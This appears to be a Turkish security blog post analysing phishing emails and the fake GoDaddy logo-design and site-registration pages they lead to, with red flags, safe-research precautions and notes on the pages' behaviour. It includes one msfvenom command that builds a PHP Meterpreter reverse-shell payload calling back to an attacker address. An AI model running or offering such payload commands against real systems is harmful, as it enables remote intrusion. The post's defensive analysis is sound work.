Bugün phishing sayfası inceleyeceğiz,
Gönül isterdi ki maillerden birindeki linki ziyaret edince shell verelim ama....ne yapalım, eylül ayında phishing daha bir modaymış.
Gönül isterdi ki maillerden birindeki linki ziyaret edince shell verelim ama....ne yapalım, eylül ayında phishing daha bir modaymış.
Mail hesabımıza giriş yapıp spam klasörünü ziyaret ettiğimizde birkaç tane potansiyel phishing maili gözümüze çarpıyor. Bu kaçınılmaz.
Gerekli önlemleri aldıktan sonra bu mailleri (çok dikkatlice) açıp gönderilen linkleri takip ediyoruz.
Bu süreç sırasında dikkat edilmesi gereken bir takım şeyler aşağıdaki gibidir.
- Arkada bir sniffer çalıştırılması,
- Bir proxy ile araya girilmesi,
- Netstat komutları ile dışarı çıkan bağlantıların kontrol edilmesi,
- İşlemlerin tek kullanımlık olmak üzere kurulan bir honeypot üzerinden yapılması,
- İşlemlerin ümkünse honeypot üzerinde çalışan bir VM üzerinden yapılması,
- MAC adresi, IP adresi, user-agent bilgileri vb. gibi size işaret edebilecek bilgilerin ifşa olmaması,
- Kullanılan cihaz üzerinde size işaret edebilecek herhangi bir bilgi bulunmaması,
- Cihaza güçlü bir yönetici parolası tanımlı olması,
- Cihazın bulunduğu ağda başka cihaz olmaması.
Sniffer ve proxy, çoğunlukla neler olmuş neler bitmiş kaçırmayalım diye. Günün sonunda hacklenmemek elden değil. Sayfayı ziyaret ettiğimiz anda sayfanın kaynak kodunu tarayıcımız üstünde çalıştırıyoruz. Ne kadar paranoyakça burpsuite kullanırsak kullanalım, bu türlü saçma ve riskli bir işe girişmeden önce tarayıcımızın hatta bilgisayarımızın ele geçirileceğini göz önünde bulundurup buna göre önlemler almalıyız. Araştırma yaptığımız bilgisayar bir sanal makine olsa bile. Nasıl olsa internette VM escape exploitleri mevcut.
GoDaddy Logo Dizaynı - Kredi Kartı Dolandırıcılığı
İlk e-postamızı açıyoruz. Bu mail GoDaddy'den kiraladığım bgoksel.com alan adıyla ilgili olduğunu iddia ediyor. Ama bu bana özel bir saldırı olduğu anlamına gelmiyor. Arka tarafta yeni alınan alan adlarını takip eden bir program çalışıyor olması pek mümkün.
Yukarıdaki e-postanın bir phishing e-postası olduğuna dair birkaç işaret var.
- Bir şeylerin yanlış olduğu ve düzeltilmesi gerektiği söyleniyor. (Talep oluşturma)
- "Korkmayın, biz buradayız" deniliyor. (Talebi karşılama)
- %80 gibi mantıksızlık limitinde yüksek bir indirim oranı teklif ediliyor. (Süper Fırsat!)
- "24 saat içinde aldınız aldınız!" deniliyor. (Aciliyet oluşturma)
Reklamlarda bu tür dolandırıcılık girişmlerinde kullanılan taktiklere sık sık rastlarız. Kendinizi internette güvende tutmak için bu tür bir bakış açısı geliştirebilirsiniz.
E-postada bulunan linklerden bir tanesine tıkladığımızda açılan sayfa --adından da anlaşılacağı üzere, GoDaddy alan adları için logo dizaynı yaptığını iddia ediyor.
Bu gibi durumlarda bazı sayfalar bilmediğimiz scriptler çağırmayı deneyebilir. Proxy'mizde gelen giden istekleri incelerken buna dikkat etmeliyiz. Bugün herhangi birinin zararlı bir PHP yazılımı "geliştirmesi" aşağıdaki kadar kolay:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.24 LPORT=6666 -f raw > meterpreter.php
Sayfayı ziyaret ettiğimizde bize bir sürü form doldurtup sonunda aşağıdaki sayfaya yönlendiriyor.
Hiç zaman kaybetmeden formu yanlış değerlerle dolduruyoruz.
"Activate Now" dediğimizde, göndereceğimiz POST request proxy tarfından yakalanıyor. Böylece sayfanın kaynak kodunda herhangi bir kontrol olmadığını tespit etmiş oluyoruz.
İsteği karşıya yolladığımızda ise, "size geri dönüş yapacağız" ekranıyla karşılaşıyoruz ve bilinçsiz bir kullanıcı olduğumuzu hayal edecek olursak, kredi kartı bilgilerimizi kaptırmış oluyoruz.
Diğer maillerden devam ettiğimizde aynı dolandırıcılık sayfasının birkaç farklı variyasyonuna denk geliyoruz.
godaddydesigners(nokta)com
zaradesignstudio(nokta)com
Register Site - Kredi Kartı Dolandırıcılığı
Bir diğer spam e-postasını açtığımızda aşağıdaki gibi bir mail içeriğiyle karşılaşıyoruz.
Gördüğümüz büyük kırmızı butona basacak olursak bizi aşağıdaki web sayfasına yönlendiriyor.
Başka bir şey yaptığını iddia eden, benzer bir phishing sitesiyle karşı karşıya olduğumuz belli.
Sayfanın kaynak koduna bakacak olursak,
Sayfadan çıkmaya çalıştığımızda sayfa bize "DUR! Çıkma! Sayfanda bir sorun var!" gibi şeyler diyecek. Eğer bir sayfadan çıkmaya çalıştığınızda karşınıza pop-up penceresi çıkıyorsa eşgallenmenin zamanıdır. Eğer herhangi bir cümlenin başında sonunda ünlem görüyorsanız bunun bir dolandırıcılık sayfası olma ihtimali çok yüksek.
Şimdi çıkmaya çalışalım ve bunun nasıl çalıştığına bakalım.
Sayfaya bir süre dokunmadığımızda karşımıza aşağıdaki gibi bir pencere çıkıyor.
Bir kez daha herhangi bir işlem yapmadık. Sayfa bize işlemin %50 sinin tamamlandığını söylüyor. Şimdiye sayfayı çoktan kapatmalıydık. Ama araştırma uğruna karşımıza çıkan formu dolduruyoruz.
Bu sırada IP adresimiz üstünün çizili olduğu yerde not ediliyor. (Loglardan görüntülemek için ekstra efor sarfetmemek adına.)
Kullanıcıyı oyalama ve inandırıcılık / cazibe katma adına aşağıdaki gibi birkaç sayfaya yönlendiriliyoruz.
İşte asıl beklenen an geldi.
Bir önceki logo dizaynı sayfasından farklı olarak, buraya ne tür bir değer girerseniz girin size hata mesajı veriyor. Ama arka tarafta girilen değerleri kaydediyor.
Siteden çıkış yapmaya çalıştığımızda sırayla iki tane hata mesajıyla karşılaşıyoruz.
Hata mesajının nasıl üretildiğini biraz inceleyecek olursak, formatın
errors[herhangi int değeri]= "pop-up'a yazılacak mesaj"
şeklinde olduğunu görüyoruz.
Buraya kendimiz bir şey yazacak olursak,
yazdığımız değerin alert edildiğini görüyoruz.
Kaynak kodda bu işlemin gerçekleştiği yer aşağıdadır.
Proxy ile trafiği incelerken denk geldiğimiz URL'leri kurcalayacak olduğumuzda dizin görüntülemeye izin verildiğini görüyoruz.
Aynı işlemi yapan ama farklı görünümlere sahip olan birden fazla sayfanın aynı alan adı üzerinden sunulduğunu görebiliriz.
Farklı insanlara farklı şekillerde hitap etmek amaçlanmış olabilir. Sayfanın başka bir versiyonunda ise, aciliyet hissi uyandırmak için siteye bir zamanlayıcı eklenmiştir.
Sayfanın kimin adına kayıtlı olduğuna baktığımızda ise, bir whois bilgisi gizleme hizmeti kullanıldığını görüyoruz.
Bu noktada araştırmamıza son verebiliriz. Bakalım ekim ayının sonunda neler çıkacak. Eğer mailime düşsün de inceleyeyim diye beklemek istemezsek her zaman Google'ı kullanabiliriz. Sırf bu araştırmadan aylarca yetecek kadar keyword çıktı.
ÖNEMLİ NOT: Kendinizden emin değilseniz ve kullandığınız cihazdan vazgeçmeye hazır değilseniz, araştırma için zararlı sayfaları ziyaret etmenizi kesinlikle tavsiye etmem. Varlığından haberimiz olmadığı 0-gün tarayıcı açıklarının istismar edilmesinden, araştırma yaptığımız dakikalar içinde ağımızdaki diğer cihazların şifrelenmesine kadar birçok şey ve daha aklımıza gelmeyecek HERŞEY olabilir.